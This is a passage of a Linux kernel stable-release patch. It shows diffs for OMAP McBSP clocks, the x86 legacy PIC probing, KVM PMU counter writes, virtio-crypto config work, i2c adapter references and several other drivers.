+ 				reg-names = "mpu";
++				clocks = <&l4_per_clkctrl OMAP4_MCBSP4_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 16 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/boot/dts/omap5-l4-abe.dtsi b/arch/arm/boot/dts/omap5-l4-abe.dtsi
+index a03bca5a35844..97b0c3b5f573f 100644
+--- a/arch/arm/boot/dts/omap5-l4-abe.dtsi
++++ b/arch/arm/boot/dts/omap5-l4-abe.dtsi
+@@ -109,6 +109,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49022000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP1_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -142,6 +144,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49024000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP2_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -175,6 +179,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49026000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP3_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/mach-omap1/timer32k.c b/arch/arm/mach-omap1/timer32k.c
+index 410d17d1d4431..f618a6df29382 100644
+--- a/arch/arm/mach-omap1/timer32k.c
++++ b/arch/arm/mach-omap1/timer32k.c
+@@ -176,17 +176,18 @@ static u64 notrace omap_32k_read_sched_clock(void)
+ 	return sync32k_cnt_reg ? readl_relaxed(sync32k_cnt_reg) : 0;
+ }
+ 
++static struct timespec64 persistent_ts;
++static cycles_t cycles;
++static unsigned int persistent_mult, persistent_shift;
++
+ /**
+  * omap_read_persistent_clock64 -  Return time from a persistent clock.
++ * @ts: &struct timespec64 for the returned time
+  *
+  * Reads the time from a source which isn't disabled during PM, the
+  * 32k sync timer.  Convert the cycles elapsed since last read into
+  * nsecs and adds to a monotonically increasing timespec64.
+  */
+-static struct timespec64 persistent_ts;
+-static cycles_t cycles;
+-static unsigned int persistent_mult, persistent_shift;
+-
+ static void omap_read_persistent_clock64(struct timespec64 *ts)
+ {
+ 	unsigned long long nsecs;
+@@ -206,10 +207,9 @@ static void omap_read_persistent_clock64(struct timespec64 *ts)
+ /**
+  * omap_init_clocksource_32k - setup and register counter 32k as a
+  * kernel clocksource
+- * @pbase: base addr of counter_32k module
+- * @size: size of counter_32k to map
++ * @vbase: base addr of counter_32k module
+  *
+- * Returns 0 upon success or negative error code upon failure.
++ * Returns: %0 upon success or negative error code upon failure.
+  *
+  */
+ static int __init omap_init_clocksource_32k(void __iomem *vbase)
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+index 9bdc0b93001f4..b2b3c72a0f87d 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+@@ -493,6 +493,7 @@
+ 
+ &i2s0 {
+ 	pinctrl-0 = <&i2s0_2ch_bus>;
++	pinctrl-1 = <&i2s0_2ch_bus_bclk_off>;
+ 	rockchip,capture-channels = <2>;
+ 	rockchip,playback-channels = <2>;
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 59858f2dc8b9f..5f3caf01badeb 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -2396,6 +2396,16 @@
+ 					<4 RK_PA0 1 &pcfg_pull_none>;
+ 			};
+ 
++			i2s0_2ch_bus_bclk_off: i2s0-2ch-bus-bclk-off {
++				rockchip,pins =
++					<3 RK_PD0 RK_FUNC_GPIO &pcfg_pull_none>,
++					<3 RK_PD1 1 &pcfg_pull_none>,
++					<3 RK_PD2 1 &pcfg_pull_none>,
++					<3 RK_PD3 1 &pcfg_pull_none>,
++					<3 RK_PD7 1 &pcfg_pull_none>,
++					<4 RK_PA0 1 &pcfg_pull_none>;
++			};
++
+ 			i2s0_8ch_bus: i2s0-8ch-bus {
+ 				rockchip,pins =
+ 					<3 RK_PD0 1 &pcfg_pull_none>,
+diff --git a/arch/sparc/lib/checksum_32.S b/arch/sparc/lib/checksum_32.S
+index 781e39b3c009f..481e94e1f6857 100644
+--- a/arch/sparc/lib/checksum_32.S
++++ b/arch/sparc/lib/checksum_32.S
+@@ -453,5 +453,5 @@ ccslow:	cmp	%g1, 0
+  * we only bother with faults on loads... */
+ 
+ cc_fault:
+-	ret
++	retl
+ 	 clr	%o0
+diff --git a/arch/x86/include/asm/i8259.h b/arch/x86/include/asm/i8259.h
+index 637fa1df35124..c715097e92fd2 100644
+--- a/arch/x86/include/asm/i8259.h
++++ b/arch/x86/include/asm/i8259.h
+@@ -69,6 +69,8 @@ struct legacy_pic {
+ 	void (*make_irq)(unsigned int irq);
+ };
+ 
++void legacy_pic_pcat_compat(void);
++
+ extern struct legacy_pic *legacy_pic;
+ extern struct legacy_pic null_legacy_pic;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index b3af2d45bbbb5..5190cc3db771e 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -27,6 +27,7 @@
+  *		_X	- regular server parts
+  *		_D	- micro server parts
+  *		_N,_P	- other mobile parts
++ *		_H	- premium mobile parts
+  *		_S	- other client parts
+  *
+  *		Historical OPTDIFFs:
+@@ -125,6 +126,7 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE_H		0xC5
+ #define INTEL_FAM6_ARROWLAKE		0xC6
+ 
+ /* "Small Core" Processors (Atom/E-Core) */
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 0f762070a5e10..2252340b2133e 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -147,6 +147,9 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+ 
++	if (madt->flags & ACPI_MADT_PCAT_COMPAT)
++		legacy_pic_pcat_compat();
++
+ 	/* ACPI 6.3 and newer support the online capable bit. */
+ 	if (acpi_gbl_FADT.header.revision > 6 ||
+ 	    (acpi_gbl_FADT.header.revision == 6 &&
+diff --git a/arch/x86/kernel/i8259.c b/arch/x86/kernel/i8259.c
+index f91e5e31aa4f0..2ac5f488300cf 100644
+--- a/arch/x86/kernel/i8259.c
++++ b/arch/x86/kernel/i8259.c
+@@ -32,6 +32,7 @@
+  */
+ static void init_8259A(int auto_eoi);
+ 
++static bool pcat_compat __ro_after_init;
+ static int i8259A_auto_eoi;
+ DEFINE_RAW_SPINLOCK(i8259A_lock);
+ 
+@@ -301,15 +302,32 @@ static void unmask_8259A(void)
+ 
+ static int probe_8259A(void)
+ {
++	unsigned char new_val, probe_val = ~(1 << PIC_CASCADE_IR);
+ 	unsigned long flags;
+-	unsigned char probe_val = ~(1 << PIC_CASCADE_IR);
+-	unsigned char new_val;
++
++	/*
++	 * If MADT has the PCAT_COMPAT flag set, then do not bother probing
++	 * for the PIC. Some BIOSes leave the PIC uninitialized and probing
++	 * fails.
++	 *
++	 * Right now this causes problems as quite some code depends on
++	 * nr_legacy_irqs() > 0 or has_legacy_pic() == true. This is silly
++	 * when the system has an IO/APIC because then PIC is not required
++	 * at all, except for really old machines where the timer interrupt
++	 * must be routed through the PIC. So just pretend that the PIC is
++	 * there and let legacy_pic->init() initialize it for nothing.
++	 *
++	 * Alternatively this could just try to initialize the PIC and
++	 * repeat the probe, but for cases where there is no PIC that's
++	 * just pointless.
++	 */
++	if (pcat_compat)
++		return nr_legacy_irqs();
++
+ 	/*
+-	 * Check to see if we have a PIC.
+-	 * Mask all except the cascade and read
+-	 * back the value we just wrote. If we don't
+-	 * have a PIC, we will read 0xff as opposed to the
+-	 * value we wrote.
++	 * Check to see if we have a PIC.  Mask all except the cascade and
++	 * read back the value we just wrote. If we don't have a PIC, we
++	 * will read 0xff as opposed to the value we wrote.
+ 	 */
+ 	raw_spin_lock_irqsave(&i8259A_lock, flags);
+ 
+@@ -431,5 +449,9 @@ static int __init i8259A_init_ops(void)
+ 
+ 	return 0;
+ }
+-
+ device_initcall(i8259A_init_ops);
++
++void __init legacy_pic_pcat_compat(void)
++{
++	pcat_compat = true;
++}
+diff --git a/arch/x86/kvm/pmu.h b/arch/x86/kvm/pmu.h
+index c976490b75568..3666578b88a00 100644
+--- a/arch/x86/kvm/pmu.h
++++ b/arch/x86/kvm/pmu.h
+@@ -63,6 +63,12 @@ static inline u64 pmc_read_counter(struct kvm_pmc *pmc)
+ 	return counter & pmc_bitmask(pmc);
+ }
+ 
++static inline void pmc_write_counter(struct kvm_pmc *pmc, u64 val)
++{
++	pmc->counter += val - pmc_read_counter(pmc);
++	pmc->counter &= pmc_bitmask(pmc);
++}
++
+ static inline void pmc_release_perf_event(struct kvm_pmc *pmc)
+ {
+ 	if (pmc->perf_event) {
+diff --git a/arch/x86/kvm/svm/pmu.c b/arch/x86/kvm/svm/pmu.c
+index 9d65cd095691b..1cb2bf9808f57 100644
+--- a/arch/x86/kvm/svm/pmu.c
++++ b/arch/x86/kvm/svm/pmu.c
+@@ -149,7 +149,7 @@ static int amd_pmu_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 	/* MSR_PERFCTRn */
+ 	pmc = get_gp_pmc_amd(pmu, msr, PMU_TYPE_COUNTER);
+ 	if (pmc) {
+-		pmc->counter += data - pmc_read_counter(pmc);
++		pmc_write_counter(pmc, data);
+ 		pmc_update_sample_period(pmc);
+ 		return 0;
+ 	}
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 9fabfe71fd879..9a75a0d5deae1 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -461,11 +461,11 @@ static int intel_pmu_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 			if (!msr_info->host_initiated &&
+ 			    !(msr & MSR_PMC_FULL_WIDTH_BIT))
+ 				data = (s64)(s32)data;
+-			pmc->counter += data - pmc_read_counter(pmc);
++			pmc_write_counter(pmc, data);
+ 			pmc_update_sample_period(pmc);
+ 			return 0;
+ 		} else if ((pmc = get_fixed_pmc(pmu, msr))) {
+-			pmc->counter += data - pmc_read_counter(pmc);
++			pmc_write_counter(pmc, data);
+ 			pmc_update_sample_period(pmc);
+ 			return 0;
+ 		} else if ((pmc = get_gp_pmc(pmu, msr, MSR_P6_EVNTSEL0))) {
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 1007f80278579..009b0d76bf036 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -723,6 +723,12 @@ static unsigned int calculate_io_allowed(u32 iops_limit,
+ 
+ static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
+ {
++	/*
++	 * Can result be wider than 64 bits?
++	 * We check against 62, not 64, due to ilog2 truncation.
++	 */
++	if (ilog2(bps_limit) + ilog2(jiffy_elapsed) - ilog2(HZ) > 62)
++		return U64_MAX;
+ 	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
+ }
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 2b9676416b8e8..e614eb3355d39 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1084,10 +1084,11 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 
+ 		/*
+ 		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
+-		 * and resume only. For system level suspend/resume, devices
+-		 * power state is handled directly by libata EH.
++		 * and resume and shutdown only. For system level suspend/resume,
++		 * devices power state is handled directly by libata EH.
+ 		 */
+ 		sdev->manage_runtime_start_stop = true;
++		sdev->manage_shutdown = true;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index e0de6565800d2..33fedbd096f33 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -3340,6 +3340,7 @@ static void possible_parent_show(struct seq_file *s, struct clk_core *core,
+ 				 unsigned int i, char terminator)
+ {
+ 	struct clk_core *parent;
++	const char *name = NULL;
+ 
+ 	/*
+ 	 * Go through the following options to fetch a parent's name.
+@@ -3354,18 +3355,20 @@ static void possible_parent_show(struct seq_file *s, struct clk_core *core,
+ 	 * registered (yet).
+ 	 */
+ 	parent = clk_core_get_parent_by_index(core, i);
+-	if (parent)
++	if (parent) {
+ 		seq_puts(s, parent->name);
+-	else if (core->parents[i].name)
++	} else if (core->parents[i].name) {
+ 		seq_puts(s, core->parents[i].name);
+-	else if (core->parents[i].fw_name)
++	} else if (core->parents[i].fw_name) {
+ 		seq_printf(s, "<%s>(fw)", core->parents[i].fw_name);
+-	else if (core->parents[i].index >= 0)
+-		seq_puts(s,
+-			 of_clk_get_parent_name(core->of_node,
+-						core->parents[i].index));
+-	else
+-		seq_puts(s, "(missing)");
++	} else {
++		if (core->parents[i].index >= 0)
++			name = of_clk_get_parent_name(core->of_node, core->parents[i].index);
++		if (!name)
++			name = "(missing)";
++
++		seq_puts(s, name);
++	}
+ 
+ 	seq_putc(s, terminator);
+ }
+diff --git a/drivers/clk/ti/clk-44xx.c b/drivers/clk/ti/clk-44xx.c
+index 868bc7af21b0b..9b2824ed785b9 100644
+--- a/drivers/clk/ti/clk-44xx.c
++++ b/drivers/clk/ti/clk-44xx.c
+@@ -749,9 +749,14 @@ static struct ti_dt_clk omap44xx_clks[] = {
+ 	DT_CLK(NULL, "mcbsp1_sync_mux_ck", "abe-clkctrl:0028:26"),
+ 	DT_CLK(NULL, "mcbsp2_sync_mux_ck", "abe-clkctrl:0030:26"),
+ 	DT_CLK(NULL, "mcbsp3_sync_mux_ck", "abe-clkctrl:0038:26"),
++	DT_CLK("40122000.mcbsp", "prcm_fck", "abe-clkctrl:0028:26"),
++	DT_CLK("40124000.mcbsp", "prcm_fck", "abe-clkctrl:0030:26"),
++	DT_CLK("40126000.mcbsp", "prcm_fck", "abe-clkctrl:0038:26"),
+ 	DT_CLK(NULL, "mcbsp4_sync_mux_ck", "l4-per-clkctrl:00c0:26"),
++	DT_CLK("48096000.mcbsp", "prcm_fck", "l4-per-clkctrl:00c0:26"),
+ 	DT_CLK(NULL, "ocp2scp_usb_phy_phy_48m", "l3-init-clkctrl:00c0:8"),
+ 	DT_CLK(NULL, "otg_60m_gfclk", "l3-init-clkctrl:0040:24"),
++	DT_CLK(NULL, "pad_fck", "pad_clks_ck"),
+ 	DT_CLK(NULL, "per_mcbsp4_gfclk", "l4-per-clkctrl:00c0:24"),
+ 	DT_CLK(NULL, "pmd_stm_clock_mux_ck", "emu-sys-clkctrl:0000:20"),
+ 	DT_CLK(NULL, "pmd_trace_clk_mux_ck", "emu-sys-clkctrl:0000:22"),
+diff --git a/drivers/clk/ti/clk-54xx.c b/drivers/clk/ti/clk-54xx.c
+index b4aff76eb3735..74dfd5823f835 100644
+--- a/drivers/clk/ti/clk-54xx.c
++++ b/drivers/clk/ti/clk-54xx.c
+@@ -565,15 +565,19 @@ static struct ti_dt_clk omap54xx_clks[] = {
+ 	DT_CLK(NULL, "gpio8_dbclk", "l4per-clkctrl:00f8:8"),
+ 	DT_CLK(NULL, "mcbsp1_gfclk", "abe-clkctrl:0028:24"),
+ 	DT_CLK(NULL, "mcbsp1_sync_mux_ck", "abe-clkctrl:0028:26"),
++	DT_CLK("40122000.mcbsp", "prcm_fck", "abe-clkctrl:0028:26"),
+ 	DT_CLK(NULL, "mcbsp2_gfclk", "abe-clkctrl:0030:24"),
+ 	DT_CLK(NULL, "mcbsp2_sync_mux_ck", "abe-clkctrl:0030:26"),
++	DT_CLK("40124000.mcbsp", "prcm_fck", "abe-clkctrl:0030:26"),
+ 	DT_CLK(NULL, "mcbsp3_gfclk", "abe-clkctrl:0038:24"),
+ 	DT_CLK(NULL, "mcbsp3_sync_mux_ck", "abe-clkctrl:0038:26"),
++	DT_CLK("40126000.mcbsp", "prcm_fck", "abe-clkctrl:0038:26"),
+ 	DT_CLK(NULL, "mmc1_32khz_clk", "l3init-clkctrl:0008:8"),
+ 	DT_CLK(NULL, "mmc1_fclk", "l3init-clkctrl:0008:25"),
+ 	DT_CLK(NULL, "mmc1_fclk_mux", "l3init-clkctrl:0008:24"),
+ 	DT_CLK(NULL, "mmc2_fclk", "l3init-clkctrl:0010:25"),
+ 	DT_CLK(NULL, "mmc2_fclk_mux", "l3init-clkctrl:0010:24"),
++	DT_CLK(NULL, "pad_fck", "pad_clks_ck"),
+ 	DT_CLK(NULL, "sata_ref_clk", "l3init-clkctrl:0068:8"),
+ 	DT_CLK(NULL, "timer10_gfclk_mux", "l4per-clkctrl:0008:24"),
+ 	DT_CLK(NULL, "timer11_gfclk_mux", "l4per-clkctrl:0010:24"),
+diff --git a/drivers/crypto/virtio/virtio_crypto_common.h b/drivers/crypto/virtio/virtio_crypto_common.h
+index 59a4c02594563..154590e1f7643 100644
+--- a/drivers/crypto/virtio/virtio_crypto_common.h
++++ b/drivers/crypto/virtio/virtio_crypto_common.h
+@@ -35,6 +35,9 @@ struct virtio_crypto {
+ 	struct virtqueue *ctrl_vq;
+ 	struct data_queue *data_vq;
+ 
++	/* Work struct for config space updates */
++	struct work_struct config_work;
++
+ 	/* To protect the vq operations for the controlq */
+ 	spinlock_t ctrl_lock;
+ 
+diff --git a/drivers/crypto/virtio/virtio_crypto_core.c b/drivers/crypto/virtio/virtio_crypto_core.c
+index 1198bd3063655..3842915ea7437 100644
+--- a/drivers/crypto/virtio/virtio_crypto_core.c
++++ b/drivers/crypto/virtio/virtio_crypto_core.c
+@@ -335,6 +335,14 @@ static void virtcrypto_del_vqs(struct virtio_crypto *vcrypto)
+ 	virtcrypto_free_queues(vcrypto);
+ }
+ 
++static void vcrypto_config_changed_work(struct work_struct *work)
++{
++	struct virtio_crypto *vcrypto =
++		container_of(work, struct virtio_crypto, config_work);
++
++	virtcrypto_update_status(vcrypto);
++}
++
+ static int virtcrypto_probe(struct virtio_device *vdev)
+ {
+ 	int err = -EFAULT;
+@@ -454,6 +462,8 @@ static int virtcrypto_probe(struct virtio_device *vdev)
+ 	if (err)
+ 		goto free_engines;
+ 
++	INIT_WORK(&vcrypto->config_work, vcrypto_config_changed_work);
++
+ 	return 0;
+ 
+ free_engines:
+@@ -489,6 +499,7 @@ static void virtcrypto_remove(struct virtio_device *vdev)
+ 
+ 	dev_info(&vdev->dev, "Start virtcrypto_remove.\n");
+ 
++	flush_work(&vcrypto->config_work);
+ 	if (virtcrypto_dev_started(vcrypto))
+ 		virtcrypto_dev_stop(vcrypto);
+ 	virtio_reset_device(vdev);
+@@ -503,7 +514,7 @@ static void virtcrypto_config_changed(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
+ 
+-	virtcrypto_update_status(vcrypto);
++	schedule_work(&vcrypto->config_work);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -511,6 +522,7 @@ static int virtcrypto_freeze(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
+ 
++	flush_work(&vcrypto->config_work);
+ 	virtio_reset_device(vdev);
+ 	virtcrypto_free_unused_reqs(vcrypto);
+ 	if (virtcrypto_dev_started(vcrypto))
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index e322a326546b5..7ad2e03afd4e5 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -1521,6 +1521,7 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 	if (sbp2_param_exclusive_login) {
+ 		sdev->manage_system_start_stop = true;
+ 		sdev->manage_runtime_start_stop = true;
++		sdev->manage_shutdown = true;
+ 	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+diff --git a/drivers/firmware/imx/imx-dsp.c b/drivers/firmware/imx/imx-dsp.c
+index 1f410809d3ee4..0f656e4191d5c 100644
+--- a/drivers/firmware/imx/imx-dsp.c
++++ b/drivers/firmware/imx/imx-dsp.c
+@@ -115,11 +115,11 @@ static int imx_dsp_setup_channels(struct imx_dsp_ipc *dsp_ipc)
+ 		dsp_chan->idx = i % 2;
+ 		dsp_chan->ch = mbox_request_channel_byname(cl, chan_name);
+ 		if (IS_ERR(dsp_chan->ch)) {
+-			kfree(dsp_chan->name);
+ 			ret = PTR_ERR(dsp_chan->ch);
+ 			if (ret != -EPROBE_DEFER)
+ 				dev_err(dev, "Failed to request mbox chan %s ret %d\n",
+ 					chan_name, ret);
++			kfree(dsp_chan->name);
+ 			goto out;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index 53a3bb7fc9c47..1bfd7b49fe9c3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -1147,7 +1147,7 @@ static void vi_program_aspm(struct amdgpu_device *adev)
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_pcie_dynamic_switching_supported())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index f854cb5eafbe7..72b2b171e533e 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -2574,14 +2574,14 @@ static struct drm_dp_mst_branch *get_mst_branch_device_by_guid_helper(
+ 	struct drm_dp_mst_branch *found_mstb;
+ 	struct drm_dp_mst_port *port;
+ 
++	if (!mstb)
++		return NULL;
++
+ 	if (memcmp(mstb->guid, guid, 16) == 0)
+ 		return mstb;
+ 
+ 
+ 	list_for_each_entry(port, &mstb->ports, next) {
+-		if (!port->mstb)
+-			continue;
+-
+ 		found_mstb = get_mst_branch_device_by_guid_helper(port->mstb, guid);
+ 
+ 		if (found_mstb)
+diff --git a/drivers/gpu/drm/i915/i915_pmu.c b/drivers/gpu/drm/i915/i915_pmu.c
+index 958b37123bf12..89eec585880f0 100644
+--- a/drivers/gpu/drm/i915/i915_pmu.c
++++ b/drivers/gpu/drm/i915/i915_pmu.c
+@@ -760,9 +760,18 @@ static void i915_pmu_event_start(struct perf_event *event, int flags)
+ 
+ static void i915_pmu_event_stop(struct perf_event *event, int flags)
+ {
++	struct drm_i915_private *i915 =
++		container_of(event->pmu, typeof(*i915), pmu.base);
++	struct i915_pmu *pmu = &i915->pmu;
++
++	if (pmu->closed)
++		goto out;
++
+ 	if (flags & PERF_EF_UPDATE)
+ 		i915_pmu_event_read(event);
+ 	i915_pmu_disable(event);
++
++out:
+ 	event->hw.state = PERF_HES_STOPPED;
+ }
+ 
+diff --git a/drivers/gpu/drm/logicvc/Kconfig b/drivers/gpu/drm/logicvc/Kconfig
+index fa7a883688094..1df22a852a23e 100644
+--- a/drivers/gpu/drm/logicvc/Kconfig
++++ b/drivers/gpu/drm/logicvc/Kconfig
+@@ -5,5 +5,7 @@ config DRM_LOGICVC
+ 	select DRM_KMS_HELPER
+ 	select DRM_KMS_DMA_HELPER
+ 	select DRM_GEM_DMA_HELPER
++	select REGMAP
++	select REGMAP_MMIO
+ 	help
+ 	  DRM display driver for the logiCVC programmable logic block from Xylon
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index 866c52afb8b0a..6adf3b141316b 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -749,6 +749,8 @@ static void __aspeed_i2c_reg_slave(struct aspeed_i2c_bus *bus, u16 slave_addr)
+ 	func_ctrl_reg_val = readl(bus->base + ASPEED_I2C_FUN_CTRL_REG);
+ 	func_ctrl_reg_val |= ASPEED_I2CD_SLAVE_EN;
+ 	writel(func_ctrl_reg_val, bus->base + ASPEED_I2C_FUN_CTRL_REG);
++
++	bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
+ }
+ 
+ static int aspeed_i2c_reg_slave(struct i2c_client *client)
+@@ -765,7 +767,6 @@ static int aspeed_i2c_reg_slave(struct i2c_client *client)
+ 	__aspeed_i2c_reg_slave(bus, client->addr);
+ 
+ 	bus->slave = client;
+-	bus->slave_state = ASPEED_I2C_SLAVE_INACTIVE;
+ 	spin_unlock_irqrestore(&bus->lock, flags);
+ 
+ 	return 0;
+diff --git a/drivers/i2c/busses/i2c-stm32f7.c b/drivers/i2c/busses/i2c-stm32f7.c
+index d1c59d83a65b9..cb995449ebf3d 100644
+--- a/drivers/i2c/busses/i2c-stm32f7.c
++++ b/drivers/i2c/busses/i2c-stm32f7.c
+@@ -1059,9 +1059,10 @@ static int stm32f7_i2c_smbus_xfer_msg(struct stm32f7_i2c_dev *i2c_dev,
+ 	/* Configure PEC */
+ 	if ((flags & I2C_CLIENT_PEC) && f7_msg->size != I2C_SMBUS_QUICK) {
+ 		cr1 |= STM32F7_I2C_CR1_PECEN;
+-		cr2 |= STM32F7_I2C_CR2_PECBYTE;
+-		if (!f7_msg->read_write)
++		if (!f7_msg->read_write) {
++			cr2 |= STM32F7_I2C_CR2_PECBYTE;
+ 			f7_msg->count++;
++		}
+ 	} else {
+ 		cr1 &= ~STM32F7_I2C_CR1_PECEN;
+ 		cr2 &= ~STM32F7_I2C_CR2_PECBYTE;
+@@ -1149,8 +1150,10 @@ static void stm32f7_i2c_smbus_rep_start(struct stm32f7_i2c_dev *i2c_dev)
+ 	f7_msg->stop = true;
+ 
+ 	/* Add one byte for PEC if needed */
+-	if (cr1 & STM32F7_I2C_CR1_PECEN)
++	if (cr1 & STM32F7_I2C_CR1_PECEN) {
++		cr2 |= STM32F7_I2C_CR2_PECBYTE;
+ 		f7_msg->count++;
++	}
+ 
+ 	/* Set number of bytes to be transferred */
+ 	cr2 &= ~(STM32F7_I2C_CR2_NBYTES_MASK);
+diff --git a/drivers/i2c/muxes/i2c-demux-pinctrl.c b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+index 8e8688e8de0fb..45a3f7e7b3f68 100644
+--- a/drivers/i2c/muxes/i2c-demux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+@@ -61,7 +61,7 @@ static int i2c_demux_activate_master(struct i2c_demux_pinctrl_priv *priv, u32 ne
+ 	if (ret)
+ 		goto err;
+ 
+-	adap = of_find_i2c_adapter_by_node(priv->chan[new_chan].parent_np);
++	adap = of_get_i2c_adapter_by_node(priv->chan[new_chan].parent_np);
+ 	if (!adap) {
+ 		ret = -ENODEV;
+ 		goto err_with_revert;
+diff --git a/drivers/i2c/muxes/i2c-mux-gpmux.c b/drivers/i2c/muxes/i2c-mux-gpmux.c
+index 33024acaac02b..0ebc12575081c 100644
+--- a/drivers/i2c/muxes/i2c-mux-gpmux.c
++++ b/drivers/i2c/muxes/i2c-mux-gpmux.c
+@@ -52,7 +52,7 @@ static struct i2c_adapter *mux_parent_adapter(struct device *dev)
+ 		dev_err(dev, "Cannot parse i2c-parent\n");
+ 		return ERR_PTR(-ENODEV);
+ 	}
+-	parent = of_find_i2c_adapter_by_node(parent_np);
++	parent = of_get_i2c_adapter_by_node(parent_np);
+ 	of_node_put(parent_np);
+ 	if (!parent)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/i2c/muxes/i2c-mux-pinctrl.c b/drivers/i2c/muxes/i2c-mux-pinctrl.c
+index d5ad904756fdf..f0bc4f3994817 100644
+--- a/drivers/i2c/muxes/i2c-mux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-mux-pinctrl.c
+@@ -62,7 +62,7 @@ static struct i2c_adapter *i2c_mux_pinctrl_parent_adapter(struct device *dev)
+ 		dev_err(dev, "Cannot parse i2c-parent\n");
+ 		return ERR_PTR(-ENODEV);
+ 	}
+-	parent = of_find_i2c_adapter_by_node(parent_np);
++	parent = of_get_i2c_adapter_by_node(parent_np);
+ 	of_node_put(parent_np);
+ 	if (!parent)
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/iio/adc/exynos_adc.c b/drivers/iio/adc/exynos_adc.c
+index cff1ba57fb16a..43c8af41b4a9d 100644
+--- a/drivers/iio/adc/exynos_adc.c
